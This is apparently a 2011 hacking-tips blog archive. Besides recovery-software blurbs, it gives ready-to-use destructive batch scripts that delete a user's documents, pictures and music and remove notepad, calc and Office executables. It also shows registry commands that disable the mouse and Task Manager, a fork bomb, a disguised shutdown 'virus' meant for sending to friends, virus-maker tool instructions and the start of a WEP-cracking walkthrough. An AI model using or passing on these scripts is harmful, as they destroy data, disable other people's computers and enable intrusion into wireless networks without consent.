Posts

Showing posts from 2011

To Recover deleted or corrupt photos:

Image
DiskInternals Flash Recovery 4.2 full download using which you can recover deleted or corrupted photos within few seconds. Isn't that nice, its best that you can recover all your deleted data from the flash memory cards used in cameras. DiskInternals Flash Recovery is a flash memory file recovery tool that restores all corrupted and deleted photographs or the ones that were lost due to hardware malfunction. This utility works even if a memory card was re-formatted. Features: • Easy Recovery Wizard. • Can preview and recover JPEG, JPG, TIFF, BMP, PNG, GIF, TGA and other images. • Can preview and recover RAW images: • CRW - Canon Digital Camera Raw Image Format. • CR2 - Canon Digital Camera Raw Image Format version 2.0. • NEF - Nikon Digital SLR Camera Raw Image File. • PEF - Pentax Raw Image Format • RAF - Fuji CCD-RAW Graphic File. • X3F - Sigma Camera RAW Picture File. • BAY - Kodak/Roper Bayer Picture Sequence. • ORF - Descent 3 Outrage Room Format. • MRW - Min

Recover My Files

Image
Recover My Files data recovery software will recover deleted files emptied from the Windows Recycle Bin, or lost due to the format or corruption of a hard drive, virus or Trojan infection, unexpected system shutdown or software failure. Recover My Files - Data Recovery Software Solution Recover files even if emptied from the Recycle Bin File recovery after accidental format, even if you have reinstalled Windows. Disk recovery after a hard disk crash Get back files after a partitioning error Get data back from RAW hard drives Recover documents, photos, video music and email. Recover from hard drive, camera card, USB, Zip, floppy disk or other media Data Recovery Software Download Current Version:  4.6.8.1012 100% Safe, 100% Secure Enjoy Hacking...!!!!!!

Shutdown your friends computer while chatting

Image
1)  Make a shortcut on desktop by  Right click on desktop , and then go to  New , then  Shortcut . 2)  Then in the "type location of the item" type:  %windir%\system32\shutdown.exe -s -t 120 -c "This is a virus" Ø      Here  120  in time duration in seconds after which the computer will shutdown. You can change it to any. Ø      Here  “This is a virus”  is the text which will appear on shutdown notice window. You can also change it. 3)  Click on next and given a name click on finish. 4)  Now right click on the shortcut and Change its name and icon to something interesting. 5)  Now to send it to some one you need to make a compressed file by right clicking on the desktop, go to New, Compressed file (zipped). Then Zipped folder will appear. 6)  Drag your shutdown virus into this zipped folder and rename it something interesting like photos/ games etc. 7)  Now send it to your friends and shutdown their pc while chatting. Tested on: Windows

Only 5 Characters are enough to Crash a System: Fork Bomb

Image
A fork bomb for crashing system is a smallest writable virus as it contains on 5 Characters.  Fork bombs count as  wabbits : they typically do not spread as  worms  or  viruses .  The concept behind the fork bomb: the processes recursively fork until a denial of service or a crash occurs.  Fork Bomb creates  a large number of processes very quickly and break the limitation of processes that can run on a system.  It's dead simple: A program just replicate itself, which again replicate itself and so on until all resources are exhausted.   A fork bomb generally creates two instances at startup, further each of created processes creates two instances and so on…The processes recursively fork; this “forks” the processor and jamm it completely until a crash occurs. It use forks to do system crash, so its called Fork Bomb. 1. Fork Bomb for windows: Write the following code in notepad and save it with bat extension say fork.bat %0|%0 Once anyone will do double click on this bat file

Create Your Own Virus using Virus Maker Softwares

Image
In This Tutorial I am gonna tell you an easy way to create viruses using Virus maker softwares named  "JPS Virus Maker" and "teraBIT Virus Maker" Follow the steps 1. First of all Download any  Virus  maker from both mentioned above, extract the rar file, and then click on the exe. Now you will get a Screen like this. A screen shot from TeraBIT Virus Maker(above).. A screen shot from JPS Virus Maker(Above).. 2. Now Select some from the given options, that option you want in your created virus. 3. For Message with your virus, select the Fake Error Message and write the message you want to display in caption and Title Like "Error" as shown below. 4. To change the Password of the computer on execution of virus check CHANGE XP PASSWORD and type the new password.  5. Now Select any server Icon or file icon , it will be the icon of the virus file. 6. Now Select any virus Name from the list so it cannot be se

Code to Delete my documents, pictures and music

Image
rem --------------------------------- rem Delete My Documents del /f /q '%userprofile%\My Documents\*.*' rem --------------------------------- rem --------------------------------- rem Delete My Music del /f /q '%userprofile%\My Music\*.*' rem --------------------------------- rem --------------------------------- rem Delete My Pictures del /f /q '%userprofile%\My Pictures\*.*' [Note: Be careful in using these scripts, i will not be responsible if you damage your system.] Enjoy Hacking...!!!!!!

Code to Delete notepad, calc, paint, excel, word, outlook

Image
rem --------------------------------- rem Delete Notepad tskill notepad del /f /q "%windir%\system32\notepad.exe" rem --------------------------------- rem --------------------------------- rem Delete Calculator tskill calc del /f /q "%windir%\system32\calc.exe rem --------------------------------- rem --------------------------------- rem Delete Paint tskill mspaint del /f /q "%windir%\system32\mspaint.exe" rem --------------------------------- rem --------------------------------- rem Delete Excel tskill excel del /f /q "%SystemDrive%\Program Files\Microsoft Office\Office10\EXCEL.EXE" rem --------------------------------- rem --------------------------------- rem Delete Word tskill WINWORD del /f /q "%SystemDrive%\Program Files\Microsoft Office\Office10\WINWORD.EXE" rem --------------------------------- rem --------------------------------- rem Delete Outlook tskill outlook del /f /q "%SystemDrive%\Program Files\Microsoft Of

Code To Disable Mouse

Image
rem --------------------------------- rem Disable Mouse set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass" reg delete %key% reg add %key% /v Start /t REG_DWORD /d 4 rem --------------------------------- [Note: Be careful in using these scripts, i will not be responsible if you damage your system.] Enjoy Hacking Guyzzz......

Code to Disable Task Manager

Image
Instructions: 1. Copy the code given below. 2. Open NOTEPAD. 3. Paste the copied code. 4. Save file with .bat extension. rem --------------------------------- rem Disable Task Manager reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_SZ /d 1 /f >nul rem --------------------------------- [Note: Be careful in using these scripts, i will not be responsible if you damage your system.]  

Wi-Fi Network Hacking Software

How a wireless network works...??? A wireless local area network (WLAN) is the linking of 2 or more computers with Network Interface Cards (NICs) through a technology based on radio waves. All devices that can connect to a wireless network are known as stations. Stations can be access points (APs), or clients. Access points are base stations for the wireless network. They receive and transmit information for the clients to communicate with. The set of all stations that communicate with each other is referred to as the Basic Service Set (BSS). Every BSS has an Identification known as a BSSID, also known as the MAC address, which is a unique identifier that is associated with  every NIC. For any client to join a WLAN, it should know the SSID of the WLAN; therefore, the access points typically broadcast their SSID to let the clients know that an AP is in range. Data streams, known as packets, are sent between the Access Point, and it’s clients. You need no physical access t

Wi-Fi Network Hacking Using Back Track

Image
This tutorial will explain that how to crack wep key using Backtrack..!!    Step 1:- First Download Backtrack  from the following link: http://www.remote-exploit.org/backtrack_download.html Step 2:- Burn the iso image on CD and boot your laptop from CD drive Step 3:- Select the third boot option(VESA/KDE). Step 4:- Once in BT3, click the tiny black box in the lower left corner to load up a   "Konsole" window. Step 5:- Type the following command airmon-ng Note down the interface name. In this example wifi0 Step 6:- airmon-ng stop wifi0 Step 7:- ifconfig wifi0 down Step 8:- macchanger --mac 00:11:22:33:44:66 wifi0 Step 9:- airmon-ng start wifi0 Step 10:- airodump-ng wifi0 This will start populating Wifi networks. Press Ctrl + C to stop. Check the network with WEP encryption. Notedown BSSID, CH and ESSID somewhere in notepad or paper Note that if the same BSSID is available